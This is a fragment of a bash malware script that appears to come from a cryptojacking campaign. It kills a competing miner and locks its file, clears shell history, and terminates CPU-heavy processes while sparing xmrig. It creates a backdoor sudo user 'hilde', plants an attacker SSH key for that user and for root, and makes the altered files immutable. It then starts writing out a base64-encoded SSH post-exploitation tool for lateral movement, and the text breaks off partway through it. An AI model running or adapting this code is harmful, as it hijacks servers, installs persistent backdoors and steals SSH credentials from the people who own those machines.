kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null
echo " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
echo $StringToLock > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
tntrecht +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
kill $(ps aux | grep -vw kswapd0 | grep -v grep |grep -v scan | grep -vw "/usr/bin/xmrigMiner" | grep -vw "./shell" | awk '{if($3>40.0) print $2}')
function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"
grep -q hilde /etc/passwd || chattr -ia /etc/passwd;
grep -q hilde /etc/passwd || tntrecht -ia /etc/passwd;
grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd; tntrecht +ia /etc/passwd
grep -q hilde /etc/shadow || chattr -ia /etc/shadow;
grep -q hilde /etc/shadow || tntrecht -ia /etc/shadow;
grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow; tntrecht +ia /etc/shadow
grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers;
grep -q hilde /etc/sudoers || tntrecht -ia /etc/sudoers;
grep -q hilde /etc/sudoers || echo 'hilde ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers; tntrecht +i /etc/sudoers
mkdir /home/hilde/.ssh/ -p
touch /home/hilde/.ssh/authorized_keys
touch /home/hilde/.ssh/authorized_keys2
chmod 600 /home/hilde/.ssh/authorized_keys
chmod 600 /home/hilde/.ssh/authorized_keys2
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || chattr -ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || tntrecht -ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || echo $RSAKEY > /home/hilde/.ssh/authorized_keys; chattr +ia /home/hilde/.ssh/authorized_keys; tntrecht +ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || chattr -ia /home/hilde/.ssh/authorized_keys2;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || tntrecht -ia /home/hilde/.ssh/authorized_keys2;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || echo $RSAKEY > /home/hilde/.ssh/authorized_keys2; chattr +ia /home/hilde/.ssh/authorized_keys2; tntrecht +ia /home/hilde/.ssh/authorized_keys2;
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q root@puppetserver /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q root@puppetserver /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
function CreateSshPunker(){
if [ ! -f "/usr/bin/pu"]
echo 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMgLSotIGNvZGluZzogdXRmLTggLSotCiMKIyAgICAgICAgICAgICB8CiMgICAgICAgICAgXCAgIHwgICAvCiMgICAgIC4gICAgIFwgIHwgIC8gICAgLgojICAgICAgYC0uX198XC9fXC98Xy4tJwojICAgIC5fXyAgXCAvICAgICBgLi8gIAojICAgICAgIGAtICAgICAgICBAfAojICAgICAgLi0nYC4gICEhICAgIC0gICBwdW5rLnB5IC0gdW5peCBTU0ggcG9zdC1leHBsb2l0YXRpb24gMTMzNyB0b29sCiMgICAgICcgICAgIGAgICEgIF9fLicgIENvcHlyaWdodCAoQykgMjAxOCA8IEdpdXNlcHBlIGByM3ZuYCBDb3J0aSA+CiMgICAgICAgICAgIF8pX19fKCAgICAgIGh0dHBzOi8veGZpbHRyYXRlZC5jb20KIwojIFRoaXMgcHJvZ3JhbSBpcyBmcmVlIHNvZnR3YXJlOiB5b3UgY2FuIHJlZGlzdHJpYnV0ZSBpdCBhbmQvb3IgbW9kaWZ5CiMgaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkKIyB0aGUgRnJlZSBTb2Z0d2FyZSBGb3VuZGF0aW9uLCBlaXRoZXIgdmVyc2lvbiAzIG9mIHRoZSBMaWNlbnNlLCBvcgojIChhdCB5b3VyIG9wdGlvbikgYW55IGxhdGVyIHZlcnNpb24uCiMKIyBUaGlzIHByb2dyYW0gaXMgZGlzdHJpYnV0ZWQgaW4gdGhlIGhvcGUgdGhhdCBpdCB3aWxsIGJlIHVzZWZ1bCwKIyBidXQgV0lUSE9VVCBBTlkgV0FSUkFOVFk7IHdpdGhvdXQgZXZlbiB0aGUgaW1wbGllZCB3YXJyYW50eSBvZgojIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIgUFVSUE9TRS4gIFNlZSB0aGUKIyBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBmb3IgbW9yZSBkZXRhaWxzLgojCiMgWW91IHNob3VsZCBoYXZlIHJlY2VpdmVkIGEgY29weSBvZiB0aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UKIyBhbG9uZyB3aXRoIHRoaXMgcHJvZ3JhbS4gIElmIG5vdCwgc2VlIDxodHRwOi8vd3d3LmdudS5vcmcvbGljZW5zZXMvPi4KCmltcG9ydCBvcwppbXBvcnQgc3lzCmltcG9ydCB0aHJlYWRpbmcKaW1wb3J0IGFyZ3BhcnNlCmltcG9ydCBiYXNlNjQKaW1wb3J0IGhhc2hsaWIKaW1wb3J0IHJlCmltcG9ydCBzb2NrZXQKaW1wb3J0IHN0cnVjdAppbXBvcnQgaG1hYwppbXBvcnQgYmluYXNjaWkKCnRyeTogCiAgICBpbXBvcnQgcXVldWUgYXMgcXVldWUKZXhjZXB0IEltcG9ydEVycm9yOgogICAgaW1wb3J0IFF1ZXVlIGFzIHF1ZXVlCgoKaG9tZXNCbGFja2xpc3QgPSBbIi9kZXYvbnVsbCIsIi92YXIvZW1wdHkiLCIvYmluIiwiL3NiaW4iXQpzaGVsbEJsYWNrbGlzdCA9IFsiL3NiaW4vbm9sb2dpbiIsIi9iaW4vZmFsc2UiLCIvdXNyL3NiaW4vbm9sb2dpbiIsIi9iaW4vc3luYyJdCmtub3duSG9zdHMgICAgID0gW10Kc3VjY2VzcyAgICAgICAgPSBbXQp1c2VycyAgICAgICAgICA9IFtdCnNzaEtleXMgICAgICAgID0gW10KCiAgIApjbGFzcyBTU0hUaHJlYWQodGhyZWFkaW5nLlRocmVhZCkgOgogCglkZWYgX19pbml0X18oc2VsZiwgcSwgdGlkLCBjcmVkZW50aWFscywgQ01EPSIiKSA6CgkJdGhyZWFkaW5nLlRocmVhZC5fX2luaXRfXyhzZWxmKQoJCXNlbGYucXVldWUgPSBxCgkJc2VsZi50aWQgPSB0aWQKCQlzZWxmLmNyZWRlbnRpYWxzID0gY3JlZGVudGlhbHMKIAoJZGVmIHJ1bihzZWxmKSA6CgkJd2hpbGUgVHJ1ZSA6CgkJCWhvc3QgPSBOb25lIAoJCQl0cnkgOgoJCQkJaG9zdCA9IHNlbGYucXVldWUuZ2V0KHRpbWVvdXQ9MSkKIAoJCQlleGNlcHQgCXF1ZXVlLkVtcHR5IDoKCQkJCXJldHVybgogCgkJCQoJCQlmb3IgdXNlciBpbiB1c2VyczoKCQkJCWZvciBrZXlzIGluIHNzaEtleXM6CgkJCQkJdHJ5OgoJCQkJCQlpZiBpbnQob3Muc3lzdGVtKCJzc2ggLW9CYXRjaE1vZGU9eWVzIC1vU3RyaWN0SG9zdEtleUNoZWNraW5nPW5vIC1vUGFzc3dvcmRBdXRoZW50aWNhdGlvbj1ubyAtb0Nvbm5lY3RUaW1lb3V0PTggJXNAJXMgLWkgJXMgLXEgZXhpdCIgJSAodXNlcixob3N0LGtleSApKSkgPT0gMDoKCQkJCQkJCXNlbGYuY3JlZGVudGlhbHMucHV0KHVzZXIrIjoiK2hvc3QrIjoiK2tleSkKCgkJCQkJCQlpZiB1c2VyKyI6Iitob3N0KyI6IitrZXkgbm90IGluIHN1Y2Nlc3M6CgkJCQkJCQkJc3lzLnN0ZG91dC53cml0ZSAoIlwwMzNbOTJtWypdXDAzM1swbSBHb3QgXDAzM1s5Mm0lc0Alc1wwMzNbMG0gd2l0aCBcMDMzWzkybVwiJXNcIlwwMzNbMG0ga2V5LlxuIiAlICh1c2VyLGhvc3Qsa2V5KSkKCQkJCQkJCQlzdWNjZXNzLmFwcGVuZCh1c2VyKyI6Iitob3N0KyI6IitrZXkpCgkJCQkJCQkKCQkJCQkJCWlmIENNRCAhPSAnJzoKCQkJCQkJCQlzeXMuc3Rkb3V0LndyaXRlICgiXDAzM1s5Mm1bKl1cMDMzWzBtIEV4ZWN1dGluZyBcMDMzWzkybSVzXDAzM1swbS5cbiIgJSAoQ01EKSkKCQkJCQkJCQlvcy5zeXN0ZW0oInNzaCAtb0JhdGNoTW9kZT15ZXMgLW9TdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLW9QYXNzd29yZEF1dGhlbnRpY2F0aW9uPW5vIC1vQ29ubmVjdFRpbWVvdXQ9OCAlc0AlcyAtaSAlcyAtcSAtdCBcIiVzXCIgIiAlICh1c2VyLGhvc3Qsa2V5LENNRCkpCgkJCQkJZXhjZXB0OgoJCQkJCQlwYXNzCiAKIAoJCQlzZWxmLnF1ZXVlLnRhc2tfZG9uZSgpCgoKY2xhc3MgQ3JhY2tUaHJlYWQodGhyZWFkaW5nLlRocmVhZCkgOgogCglkZWYgX19pbml0X18oc2VsZiwgcSwgdGlkLCBpcHMsIG1hZ2ljLCBzYWx0LCBoYXNoZWQpIDoKCQl0aHJlYWRpbmcuVGhyZWFkLl9faW5pdF9fKHNlbGYpCgkJc2VsZi5xdWV1ZSAgPSBxCgkJc2VsZi50aWQgICAgPSB0aWQKCQlzZWxmLmlwcyAgICA9IGlwcwoJCXNlbGYubWFnaWMgID0gbWFnaWMKCQlzZWxmLnNhbHQgICA9IGJhc2U2NC5iNjRkZWNvZGUoc2FsdCkKCQlzZWxmLmhhc2hlZCA9IGhhc2hlZAoKIAoJZGVmIHJ1bihzZWxmKSA6CgkJd2hpbGUgVHJ1ZSA6CgkJCWhvc3QgPSBOb25lIAoJCQl0cnkgOgoJCQkJaXBfdHJ5ID0gc2VsZi5xdWV1ZS5nZXQodGltZW91dD0xKQogCgkJCWV4Y2VwdCAJcXVldWUuRW1wdHkgOgoJCQkJcmV0dXJuCgoKCQkJaCA9IGhtYWMubmV3KHNlbGYuc2FsdCwgbXNnPWlwX3RyeS5lbmNvZGUoKSwgZGlnZXN0bW9kPWhhc2hsaWIuc2hhMSkgIyBGSVhNRQoJCQlpcF9oYXNoID0gYmFzZTY0LmI2NGVuY29kZShoLmRpZ2VzdCgpKS5kZWNvZGUoKQoKCgkJCWlmIGlwX2hhc2ggPT0gc2VsZi5oYXNoZWQ6CgkJCQlrbm93bkhvc3RzLmFwcGVuZChpcF90cnkpCgkJCQlzeXMuc3Rkb3V0LndyaXRlICgiXDAzM1s5Mm1bKl1cMDMzWzBtIEZvdW5kIFwwMzNbOTJtJXNcMDMzWzBtXG4iICUgKGlwX3RyeSkpCgoJCQkjc3lzLnN0ZG91dC53cml0ZSAoIlxuLS0tLS1cbmlwOiAiK2lwX3RyeSsiXG4gc2FsdDogIitzZWxmLnNhbHQuZGVjb2RlKCkrIlxuIG91dHB1dDogIitpcF9oYXNoKyJcbnRhcmdldDogIitzZWxmLmhhc2hlZCkKCgkJCXNlbGYucXVldWUudGFza19kb25lKCkKCgpjbGFzcyBhdHRhY2sob2JqZWN0KToKCglkZWYgX19pbml0X18oc2VsZiwgY21kLCB0aHJlYWRzKToKCQlzZWxmLmNtZCA9IGNtZAoJCXNlbGYudGhyZWFkcyA9IHRocmVhZHMKCglkZWYgcnVuKHNlbGYpOgoKCQlxICAgICAgICAgICA9IHF1ZXVlLlF1ZXVlKCkKCQljcmVkZW50aWFscyA9IHF1ZXVlLlF1ZXVlKCkKCgkJdGhyZWFkcyA9IFtdCgkJZm9yIGkgaW4gcmFuZ2UoMSwgc2VsZi50aHJlYWRzKSA6ICMgTnVtYmVyIG9mIHRocmVhZHMKCQkJd29ya2VyID0gU1NIVGhyZWFkKHEsIGksIGNyZWRlbnRpYWxzLCBzZWxmLmNtZCkgCgkJCXdvcmtlci5zZXREYWVtb24oVHJ1ZSkKCQkJd29ya2VyLnN0YXJ0KCkKCQkJdGhyZWFkcy5hcHBlbmQod29ya2VyKQoKCQlmb3IgaG9zdCBpbiBrbm93bkhvc3RzOgoJCQlxLnB1dChob3N0KQoKCQlxLmpvaW4oKQoJCSAKCQkjIHdhaXQgZm9yIGFsbCB0aHJlYWRzIHRvIGV4aXQgCgkJaWYgbm90IGNyZWRlbnRpYWxzLmVtcHR5KCk6CgkJCW91dCA9IChjcmVkZW50aWFscy5nZXQoKSkuc3BsaXQoIjoiKQoJCWVsc2U6CgkJCXJldHVybiBGYWxzZQoJCSAKCQlmb3IgaXRlbSBpbiB0aHJlYWRzIDoKCQkJaXRlbS5qb2luKCkKCgkJcmV0dXJuIG91dFswXSwgb3V0WzFdICMgT3V0cHV0IGF0dGFjazogdXNlciwgaG9zdAoKCgoKCmNsYXNzIGNyYWNrX2hvc3Qob2JqZWN0KToKCglkZWYgX19pbml0X18oc2VsZiwgaG9zdF9zdHJpbmcsIHN1Ym5ldCwgdGhyZWFkcyk6CgkJIiIiIGNyYWNrIGFuIGVuY3J5cHRlZCBrbm93biBob3N0ICIiIgoKCQlzZWxmLm1hZ2ljICAgPSBob3N0X3N0cmluZy5zcGxpdCgifCIpWzFdCgkJc2VsZi5zYWx0ICAgID0gaG9zdF9zdHJpbmcuc3BsaXQoInwiKVsyXQoJCXNlbGYuaGFzaGVkICA9IGhvc3Rfc3RyaW5nLnNwbGl0KCJ8IilbM10uc3BsaXQoIiAiKVswXQoJCXNlbGYuc3VibmV0ICA9IHN1Ym5ldCAjIFRPRE8KCQlzZWxmLnRocmVhZHMgPSB0aHJlYWRzCgoJZGVmIHJ1bihzZWxmKToKCgkJcSAgICAgICAgICAgPSBxdWV1ZS5RdWV1ZSgpCgkJaXBzICAgICAgICAgPSBxdWV1ZS5RdWV1ZSgpCgoJCXRocmVhZHMgPSBbXQoJCWZvciBpIGluIHJhbmdlKDEsIHNlbGYudGhyZWFkcykgOiAjIE51bWJlciBvZiB0aHJlYWRzCgkJCXdvcmtlciA9IENyYWNrVGhyZWFkKHEsIGksIGlwcywgc2VsZi5tYWdpYywgc2VsZi5zYWx0LCBzZWxmLmhhc2hlZCkgCgkJCXdvcmtlci5zZXREYWVtb24oVHJ1ZSkKCQkJd29ya2VyLnN0YXJ0KCkKCQkJdGhyZWFkcy5hcHBlbmQod29ya2VyKQoKCQlmb3IgaG9zdCBpbiBpcHY0X3JhbmdlKHNlbGYuc3VibmV0KTogIyBUT0RPCgkJCXEucHV0KHN0cihob3N0KSkgICAgICAgICAgICAgICMgVE9ETwoKCQlxLmpvaW4oKQoJCSAKCQkjIHdhaXQgZm9yIGFsbCB0aHJlYWRzIHRvIGV4aXQgCgkJaWYgbm90IGlwcy5lbXB0eSgpOgoJCQlvdXQgPSAoaXBzLmdldCgpKS5zcGxpdCgiOiIpCgkJZWxzZToKCQkJcmV0dXJuIEZhbHNlCgkJIAoJCWZvciBpdGVtIGluIHRocmVhZHMgOgoJCQlpdGVtLmpvaW4oKQoKCQlyZXR1cm4gb3V0WzBdLCBvdXRbMV0gIyBPdXRwdXQgYXR0YWNrOiB1c2VyLCBob3N0CgpkZWYgZGlzY292ZXJ5KGFyZ3MpOgoJIyBTZWFyY2ggdXNlcnMsIFNTSCBrZXlzIGFuZCBrbm93biBob3N0cwoKCWlmIGFyZ3MucGFzc3dkOgoJCSMgR2V0IHVzZXJzIGFuZCBob21lIHBhdGhzIGZyb20gcGFzc3dkCgkJRiA9IG9wZW4oIi9ldGMvcGFzc3dkIiwncicpCgoJCWZvciBsaW5lIGluIEY6CgkJCWlmIG5vdCBsaW5lLnN0YXJ0c3dpdGgoJyMnKTogIyBza2lwIGNvbW1lbnRzCgoJCQkJdXNlciAgPSBsaW5lLnNwbGl0KCI6IilbMF0KCQkJCWhvbWUgID0gbGluZS5zcGxpdCgiOiIpWzVdCgkJCQlzaGVsbCA9IGxpbmUuc3BsaXQoIjoiKVs2XS5yZXBsYWNlKCJcbiIsIiIpCgoJCQkJaWYgaG9tZSBub3QgaW4gaG9tZXNCbGFja2xpc3QgYW5kIHNoZWxsIG5vdCBpbiBzaGVsbEJsYWNrbGlzdDoKCgkJCQkJdXNlcnMuYXBwZW5kKHVzZXIpCgoJCQkJCSNjb2xsZWN0IGtub3duIGhvc3RzCgkJCQkJaWYgb3MucGF0aC5pc2ZpbGUoaG9tZSArICIvLnNzaC9rbm93bl9ob3N0cyIpOgoJCQkJCQlGSyA9IG9wZW4oaG9tZSArICIvLnNzaC9rbm93bl9ob3N0cyIpCgkJCQkJCWVuY3J5cHRlZF9rbm93bmhvc3RzID0gRmFsc2UKCgkJCQkJCWZvciBob3N0IGluIEZLOgoJCQkJCQkJaWYgbm90IGhvc3QuZmluZCgifCIpID49IDA6ICMgc2VjdXJlIGtub3duX2hvc3RzCgkJCQkJCQkJaWYgaG9zdC5maW5kKCIsIikgPj0gMDoKCQkJCQkJCQkJaG9zdG5hbWUgPSBob3N0LnNwbGl0KCIgIilbMF0uc3BsaXQoIiwiKVsxXQoJCQkJCQkJCWVsc2U6CgkJCQkJCQkJCWhvc3RuYW1lID0gaG9zdC5zcGxpdCgiICIpWzBdCgkJCQkJCQkJaWYgaG9zdG5hbWUgbm90IGluIGtub3duSG9zdHM6CgkJCQkJCQkJCWtub3duSG9zdHMuYXBwZW5kKGhvc3RuYW1lKQoJCQkJCQkJZWxzZToKCQkJCQkJCQllbmNyeXB0ZWRfa25vd25ob3N0cyA9IFRydWUKCQkJCQkJCQkJCgoJCQkJCQlpZiBlbmNyeXB0ZWRfa25vd25ob3N0cyBhbmQgYXJncy5jcmFjayA9PSAiIjoKCQkJCQkJCXN5cy5zdGRvdXQud3JpdGUgKCJcMDMzWzkzbVshXVwwMzNbMG0gRW5jcnlwdGVkIGtub3duIGhvc3QgYXQgXDAzM1s5M20lcy8uc3NoL2tub3duX2hvc3RzXDAzM1swbVxuIiAlIGhvbWUgKQoJCQkJCQkJc3lzLnN0ZG91dC53cml0ZSAoIlwwMzNbOTNtWyFdXDAzM1swbSBSdW4gd2l0aCBcMDMzWzkzbS0tY3JhY2tcMDMzWzBtIGZsYWcgdG8gYnJlYWsgaXRcbiIpCgoJCQkJCQllbGlmIGVuY3J5cHRlZF9rbm93bmhvc3RzIGFuZCBhcmdzLmNyYWNrICE9ICIiOgoJCQkJCQkJIyBjcmFjayB0aGUgaGFzaGVkIGtub3duIGhvc3RzCgkJCQkJCQlzeXMuc3Rkb3V0LndyaXRlICgiXDAzM1s5Mm1bKl1cMDMzWzBtIENyYWNraW5nIGtub3duIGhvc3RzIG9uIFwwMzNbOTJtJXMvLnNzaC9rbm93bl9ob3N0cy4uLlwwMzNbMG1cbiIgJSBob21lICkKCQkJCQkJCUZLID0gb3Blbihob21lICsgIi8uc3NoL2tub3duX2hvc3RzIikKCQkJCQkJCWZvciBob3N0IGluIEZLOgoJCQkJCQkJCWlmIGhvc3QuZmluZCgifCIpID49IDA6CgkJCQkJCQkJCWNyYWNrX29iaiA9IGNyYWNrX2hvc3QoaG9zdCwgYXJncy5jcmFjaywgYXJncy50aHJlYWRzKQoJCQkJCQkJCQljcmFja19vYmoucnVuKCkKCQkJCQkJCSNzeXMuc3Rkb3V0LndyaXRlICgiXDAzM1s5Mm1bKl1cMDMzWzBtIENyYWNraW5nIGRvbmUuXG4iKQoKCQkJCQkJRksuY2xvc2UoKQoKCQkJCQkjIGNoZWNrIHVzZXJzIHdpdGggcHJpdmF0ZSBrZXlzCgkJCQkJaWYgb3MucGF0aC5pc2ZpbGUoaG9tZSArICIvLnNzaC9pZF9yc2EiKTogCgkJCQkJCSN0YXJnZXRzW3VzZXJdPWhvbWUgKyAiLy5zc2gvaWRfcnNhIiAgIyB1c2VybmFtZSBhbmQgaG9tZSBkaXIKCQkJCQkJaWYgaG9tZSsiLy5zc2gvaWRfcnNhIiBub3QgaW4gc3NoS2V5czoKCQkJCQkJCXNzaEtleXMuYXBwZW5kKGhvbWUgKyAiLy5zc2gvaWRfcnNhIikKCQlGLmNsb3NlKCkKCgkjIGhvbWUgZGlyZWN0b3J5IHNjYW4KCWZvciBob21lcyBpbiBvcy5saXN0ZGlyKGFyZ3MuaG9tZSk6CgkJaWYgaG9tZXMgbm90IGluIHVzZXJzOgoKCQkJdXNlcnMuYXBwZW5kKGhvbWVzKQoKCQkJaWYgb3MucGF0aC5pc2ZpbGUoYXJncy5ob21lK2hvbWVzICsgIi8uc3NoL2lkX3JzYSIpOgoJCQkJI3RhcmdldHNbaG9tZXNdID0gaG9tZXMgKyAiLy5zc2gvaWRfcnNhIgoJCQkJaWYgYXJncy5ob21lK2hvbWVzICsgIi8uc3NoL2lkX3JzYSIgbm90IGluIHNzaEtleXM6CgkJCQkJc3NoS2V5cy5hcHBlbmQoYXJncy5ob21lK2hvbWVzICsgIi8uc3NoL2lkX3JzYSIpCgoJCQlpZiBvcy5wYXRoLmlzZmlsZShhcmdzLmhvbWUraG9tZXMgKyAiLy5zc2gva25vd25faG9zdHMiKToKCQkJCUZLID0gb3BlbihhcmdzLmhvbWUraG9tZXMgKyAiLy5zc2gva25vd25faG9zdHMiKQoJCQkJZW5jcnlwdGVkX2tub3duaG9zdHMgPSBGYWxzZQoKCQkJCWZvciBob3N0IGluIEZLOgoJCQkJCWlmIG5vdCBob3N0LmZpbmQoInwiKSA+PSAwOiAjIHNlY3VyZSBrbm93bl9ob3N0cwoJCQkJCQlpZiBob3N0LmZpbmQoIiwiKSA+PSAwOgoJCQkJCQkJaG9zdG5hbWUgPSBob3N0LnNwbGl0KCIgIilbMF0uc3BsaXQoIiwiKVsxXQoJCQkJCQllbHNlOgoJCQkJCQkJaG9zdG5hbWUgPSBob3N0LnNwbGl0KCIgIilbMF0KCQkJCQkJaWYgaG9zdG5hbWUgbm90IGluIGtub3duSG9zdHM6CgkJCQkJCQlrbm93bkhvc3RzLmFwcGVuZChob3N0bmFtZSkKCQkJCQllbHNlOgoJCQkJCQllbmNyeXB0ZWRfa25vd25ob3N0cyA9IFRydWUKCgoJCQkJaWYgZW5jcnlwdGVkX2tub3duaG9zdHMgYW5kIGFyZ3MuY3JhY2sgPT0gIiI6CgkJCQkJc3lzLnN0ZG91dC53cml0ZSAoIlwwMzNbOTNtWyFdXDAzM1swbSBFbmNyeXB0ZWQga25vd24gaG9zdCBhdCBcMDMzWzkzbSVzLy5zc2gva25vd25faG9zdHNcMDMzWzBtXG4iICUgYXJncy5ob21lICkKCQkJCQlzeXMuc3Rkb3V0LndyaXRlICgiXDAzM1s5M21bIV1cMDMzWzBtIFJ1biB3aXRoIFwwMzNbOTNtJXMtLWNyYWNrXDAzM1swbSBmbGFnIHRvIGJyZWFrIGl0XG4iKQoKCQkJCWVsaWYgZW5jcnlwdGVkX2tub3duaG9zdHMgYW5kIGFyZ3MuY3JhY2sgIT0gIiI6CgkJCQkJIyBjcmFjayB0aGUgaGFzaGVkIGtub3duIGhvc3RzCgkJCQkJc3lzLnN0ZG91dC53cml0ZSAoIlwwMzNbOTJtWypdXDAzM1swbSBDcmFja2luZyBrbm93biBob3N0cyBvbiBcMDMzWzkybSVzLy5zc2gva25vd25faG9zdHMuLi5cMDMzWzBtXG4iICUgYXJncy5ob21lICkKCQkJCQlvcGVuKGFyZ3MuaG9tZStob21lcyArICIvLnNzaC9rbm93bl9ob3N0cyIpCgkJCQkJZm9yIGhvc3QgaW4gRks6CgkJCQkJCWlmIGhvc3QuZmluZCgifCIpID49IDA6CgkJCQkJCQljcmFja19vYmogPSBjcmFja19ob3N0KGhvc3QsIGFyZ3MuY3JhY2ssIGFyZ3MudGhyZWFkcykKCQkJCQkJCWNyYWNrX29iai5ydW4oKQoKCQkJCUZLLmNsb3NlKCkKCQoJcmV0dXJuIFRydWUKCiMgQXZvaWQgaXBhZGRyZXNzIGxpYnJhcnkgc2luY2UgaXMgbm90IHN1cHBvcnRlZCBpbiBweXRob24yIAojIGh0dHBzOi8vc3RhY2tvdmVyZmxvdy5jb20vYS80MTM4Njg3NApkZWYgaW5ldF9hdG9pKGlwdjRfc3RyKToKICAgICIiIkNvbnZlcnQgZG90dGVkIGlwdjQgc3RyaW5nIHRvIGludCIiIgogICAgIyBub3RlOiB1c2Ugc29ja2V0IGZvciBwYWNrZWQgYmluYXJ5IHRoZW4gc3RydWN0IHRvIHVucGFjawogICAgcmV0dXJuIHN0cnVjdC51bnBhY2soIiFJIiwgc29ja2V0LmluZXRfYXRvbihpcHY0X3N0cikpWzBdCgpkZWYgaW5ldF9pdG9hKGlwdjRfaW50KToKICAgICIiIkNvbnZlcnQgaW50IHRvIGRvdHRlZCBpcHY0IHN0cmluZyIiIgogICAgIyBub3RlOiB1c2Ugc3RydWN0IHRvIHBhY2sgdGhlbiBzb2NrZXQgdG8gc3RyaW5nCiAgICByZXR1cm4gc29ja2V0LmluZXRfbnRvYShzdHJ1Y3QucGFjaygiIUkiLCBpcHY0X2ludCkpCgpkZWYgaXB2NF9yYW5nZShpcGFkZHIpOgogICAgIiIiUmV0dXJuIGEgbGlzdCBvZiBJUHY0IGFkZHJlc3MgY29udGlhbmVkIGluIGEgY2lkciBhZGRyZXNzIHJhbmdlIiIiCiAgICAjIHNwbGl0IG91dCBmb3IgZXhhbXBsZSAxOTIuMTY4LjEuMToyMi8yNAogICAgaXB2NF9zdHIsIHBvcnRfc3RyLCBjaWRyX3N0ciA9IHJlLm1hdGNoKAogICAgICAgIHInKFtcZFwuXSspKDpcZCspPygvXGQrKT8nLCBpcGFkZHIpLmdyb3VwcygpCgogICAgIyBjb252ZXJ0IGFzIG5lZWRlZAogICAgaXB2NF9pbnQgPSBpbmV0X2F0b2koaXB2NF9zdHIpCiAgICBwb3J0X3N0ciA9IHBvcnRfc3RyIG9yICcnCiAgICBjaWRyX3N0ciA9IGNpZHJfc3RyIG9yICcnCiAgICBjaWRyX2ludCA9IGludChjaWRyX3N0clsxOl0pIGlmIGNpZHJfc3RyIGVsc2UgMAoKICAgICMgbWFzayBpcHY0CiAgICBpcHY0X2Jhc2UgPSBpcHY0X2ludCAmICgweGZmZmZmZmZmIDw8ICgzMiAtIGNpZHJfaW50KSkKCiAgICAjIGdlbmVyYXRlIGxpc3QKICAgIGFkZHJzID0gW2luZXRfaXRvYShpcHY0X2Jhc2UgKyB2YWwpCiAgICAgICAgZm9yIHZhbCBpbiByYW5nZSgxIDw8ICgzMiAtIGNpZHJfaW50KSArIDIpXQogICAgcmV0dXJuIGFkZHJzCgoKaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoKCglzeXMuc3Rkb3V0LndyaXRlICgiIiJcMDMzWzkybQogICAgICAgICAgICAgfAogICAgICAgICBcICAgfCAgIC8KICAgIC4gICAgIFwgIHwgIC8gICAgLgogICAgIGAtLl9ffFwvX1wvfF8uLScKICAgLl9fICBcIC8gICAgIGAuLyAgCiAgICAgIGAtICAgICAgICBAfAogICAgIC4tJ2AuICAhISAgICAtICAgXDAzM1s5MG0tPVsgXDAzM1s5M21wdW5rLnB5IC0gdW5peCBTU0ggcG9zdC1leHBsb2l0YXRpb24gMTMzNyB0b29sXDAzM1s5Mm0KICAgICcgICAgIGAgICEgIF9fLicgIFwwMzNbOTBtLT1bIFwwMzNbOTNtYnkgYHIzdm5gICggdHc6IEByM3ZubiApXDAzM1s5Mm0KICAgICAgICAgIF8pX19fKCAgICAgIFwwMzNbOTB